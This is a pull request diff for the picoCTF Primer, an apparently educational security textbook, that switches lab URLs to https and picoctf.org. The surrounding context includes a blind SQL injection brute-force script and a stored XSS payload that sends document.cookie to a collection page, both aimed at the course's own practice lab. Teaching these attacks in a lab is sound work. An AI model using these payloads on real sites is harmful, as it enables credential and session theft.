### PR TITLE
Use https://primer.picoctf.org scheme and domain for all URLs

### DIFF
--- a/chapters/forensics.adoc
+++ b/chapters/forensics.adoc
@@ -33,12 +33,12 @@ Or use ssh to connect to it:
 ssh your_username@2019shell1.picoctf.com
 
 Once you are connected, download the file ‘files.zip’ from the following url:
-https://primer.picoctf.com/files/files.zip
+https://primer.picoctf.org/files/files.zip
 
 To do that, run:
 
 [source, txt]
-wget https://primer.picoctf.com/files/files.zip
+wget https://primer.picoctf.org/files/files.zip
 
 That will download the .zip file, which is a compressed folder, to your current folder. 
 To uncompress it, run:

--- a/chapters/network.adoc
+++ b/chapters/network.adoc
@@ -43,7 +43,7 @@ image::images/5image40.png[image,width=624,height=529]
 
 The capture now starts. If you have applications running on your computer or have website open in your browser, you will probably see several packets immediately, let the Wireshark window continue to run the packet sniffing. In your browser, navigate to the following link:
 
-https://primer.picoctf.com/vuln/web/sign_in.php
+https://primer.picoctf.org/vuln/web/sign_in.php
 
 You should see the following page:
 

--- a/chapters/sql.adoc
+++ b/chapters/sql.adoc
@@ -164,7 +164,7 @@ The resultant query would be:
 
 Which is a perfectly valid query that will return the whole table. Use what you just learn here to return all the users:
 
-https://primer.picoctf.com/vuln/web/basicsql.php[https://primer.picoctf.com/vuln/web/basicsql.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/basicsql.php[https://primer.picoctf.org/vuln/web/basicsql.php, window="_blank"]
 
 
 This kind of vulnerability it is rarely present in applications. One that is more common, is the blind sql injection.
@@ -175,7 +175,7 @@ In this kind of vulnerability, the application does not return all the data to y
 
 To illustrate this, we are going to attack the following page:
 
-https://primer.picoctf.com/vuln/web/blindsql.php[https://primer.picoctf.com/vuln/web/blindsql.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/blindsql.php[https://primer.picoctf.org/vuln/web/blindsql.php, window="_blank"]
 
 If we input our previous injection in the password field:
 
@@ -242,7 +242,7 @@ accum = ""
 for i in range(40):
   for letter in printable:
     accum += letter
-    r = requests.post("https://primer.picoctf.com/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
+    r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
     + letter+"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
     if 'NOTHING FOUND...' in r.text:
       accum = accum[:-1]

--- a/chapters/sql.adoc
+++ b/chapters/sql.adoc
@@ -164,7 +164,7 @@ The resultant query would be:
 
 Which is a perfectly valid query that will return the whole table. Use what you just learn here to return all the users:
 
-http://primer.picoctf.com/vuln/web/basicsql.php[http://primer.picoctf.com/vuln/web/basicsql.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/basicsql.php[https://primer.picoctf.com/vuln/web/basicsql.php, window="_blank"]
 
 
 This kind of vulnerability it is rarely present in applications. One that is more common, is the blind sql injection.
@@ -175,7 +175,7 @@ In this kind of vulnerability, the application does not return all the data to y
 
 To illustrate this, we are going to attack the following page:
 
-http://primer.picoctf.com/vuln/web/blindsql.php[http://primer.picoctf.com/vuln/web/blindsql.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/blindsql.php[https://primer.picoctf.com/vuln/web/blindsql.php, window="_blank"]
 
 If we input our previous injection in the password field:
 
@@ -242,7 +242,7 @@ accum = ""
 for i in range(40):
   for letter in printable:
     accum += letter
-    r = requests.post("http://primer.picoctf.com/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
+    r = requests.post("https://primer.picoctf.com/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
     + letter+"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")
     if 'NOTHING FOUND...' in r.text:
       accum = accum[:-1]

--- a/chapters/web.adoc
+++ b/chapters/web.adoc
@@ -296,11 +296,11 @@ Note: If you really don't want to use Firefox, every browser has a debugger that
 
 Using Firefox, input your name and some text in the description in the following link:
 
-https://primer.picoctf.com/vuln/web/sign_up.php[https://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/sign_up.php[https://primer.picoctf.org/vuln/web/sign_up.php, window="_blank"]
 
 Open another tab and visit the following link. You should see your name and description:
 
-https://primer.picoctf.com/vuln/web/tableusers.php[https://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/tableusers.php[https://primer.picoctf.org/vuln/web/tableusers.php, window="_blank"]
 
 
 Now, in the Firefox Menu, click "Web Developer" and then click "Debugger". You should see a pane like the following:
@@ -319,7 +319,7 @@ You can only see your cookie. Other users would see their cookie with their name
 
 For now, access this link again:
 
-https://primer.picoctf.com/vuln/web/sign_up.php[https://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/sign_up.php[https://primer.picoctf.org/vuln/web/sign_up.php, window="_blank"]
 
 Create a new user that has your name, but instead of the description has the following code:
 
@@ -328,7 +328,7 @@ Create a new user that has your name, but instead of the description has the fol
 
 If you navigate this link again, you will see your JavaScript code triggered:
 
-https://primer.picoctf.com/vuln/web/tableusers.php[https://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/tableusers.php[https://primer.picoctf.org/vuln/web/tableusers.php, window="_blank"]
 
 Like this:
 
@@ -338,7 +338,7 @@ image::images/image16.png[image,width=624,height=370]
 
 You just verified that you can inject JavaScript in the website. Now we are going to inject JavaScript that will steal the cookie. Create another user in the same link for creating users:
 
-https://primer.picoctf.com/vuln/web/sign_up.php[https://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/sign_up.php[https://primer.picoctf.org/vuln/web/sign_up.php, window="_blank"]
 
 But now, put this JavaScript code in the description:
 
@@ -346,7 +346,7 @@ But now, put this JavaScript code in the description:
 <script src="https://code.jquery.com/jquery-3.4.1.min.js"> </script>
 <script>
 $.get(
-    "https://primer.picoctf.com/vuln/web/insert.php",
+    "https://primer.picoctf.org/vuln/web/insert.php",
     {cookie : document.cookie, hackername : 'YourName'},
     function(data) {
         alert("I just stole the cookie!");
@@ -372,7 +372,7 @@ Is simply a function that will be executed after the request is sent to the serv
 
 Now visit this site again:
 
-https://primer.picoctf.com/vuln/web/tableusers.php[https://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/tableusers.php[https://primer.picoctf.org/vuln/web/tableusers.php, window="_blank"]
 
 When a user visits that site is when the JavaScript is executed and the cookie is stolen. You should see the message:
 
@@ -384,7 +384,7 @@ If you injected scripts previously, all those scripts are stored in the web site
 
 Now you should be able to see the cookie you stole here:
 
-https://primer.picoctf.com/vuln/web/tablestolen.php[https://primer.picoctf.com/vuln/web/tablestolen.php, window="_blank"]
+https://primer.picoctf.org/vuln/web/tablestolen.php[https://primer.picoctf.org/vuln/web/tablestolen.php, window="_blank"]
 
 [.text-center]
 .Table showing results

--- a/chapters/web.adoc
+++ b/chapters/web.adoc
@@ -296,11 +296,11 @@ Note: If you really don't want to use Firefox, every browser has a debugger that
 
 Using Firefox, input your name and some text in the description in the following link:
 
-http://primer.picoctf.com/vuln/web/sign_up.php[http://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/sign_up.php[https://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
 
 Open another tab and visit the following link. You should see your name and description:
 
-http://primer.picoctf.com/vuln/web/tableusers.php[http://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/tableusers.php[https://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
 
 
 Now, in the Firefox Menu, click "Web Developer" and then click "Debugger". You should see a pane like the following:
@@ -319,7 +319,7 @@ You can only see your cookie. Other users would see their cookie with their name
 
 For now, access this link again:
 
-http://primer.picoctf.com/vuln/web/sign_up.php[http://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/sign_up.php[https://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
 
 Create a new user that has your name, but instead of the description has the following code:
 
@@ -328,7 +328,7 @@ Create a new user that has your name, but instead of the description has the fol
 
 If you navigate this link again, you will see your JavaScript code triggered:
 
-http://primer.picoctf.com/vuln/web/tableusers.php[http://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/tableusers.php[https://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
 
 Like this:
 
@@ -338,7 +338,7 @@ image::images/image16.png[image,width=624,height=370]
 
 You just verified that you can inject JavaScript in the website. Now we are going to inject JavaScript that will steal the cookie. Create another user in the same link for creating users:
 
-http://primer.picoctf.com/vuln/web/sign_up.php[http://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/sign_up.php[https://primer.picoctf.com/vuln/web/sign_up.php, window="_blank"]
 
 But now, put this JavaScript code in the description:
 
@@ -372,7 +372,7 @@ Is simply a function that will be executed after the request is sent to the serv
 
 Now visit this site again:
 
-http://primer.picoctf.com/vuln/web/tableusers.php[http://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/tableusers.php[https://primer.picoctf.com/vuln/web/tableusers.php, window="_blank"]
 
 When a user visits that site is when the JavaScript is executed and the cookie is stolen. You should see the message:
 
@@ -384,7 +384,7 @@ If you injected scripts previously, all those scripts are stored in the web site
 
 Now you should be able to see the cookie you stole here:
 
-http://primer.picoctf.com/vuln/web/tablestolen.php[http://primer.picoctf.com/vuln/web/tablestolen.php, window="_blank"]
+https://primer.picoctf.com/vuln/web/tablestolen.php[https://primer.picoctf.com/vuln/web/tablestolen.php, window="_blank"]
 
 [.text-center]
 .Table showing results


### PR DESCRIPTION
Replaces occurrences of plain HTTP scheme and picoctf.com root domain.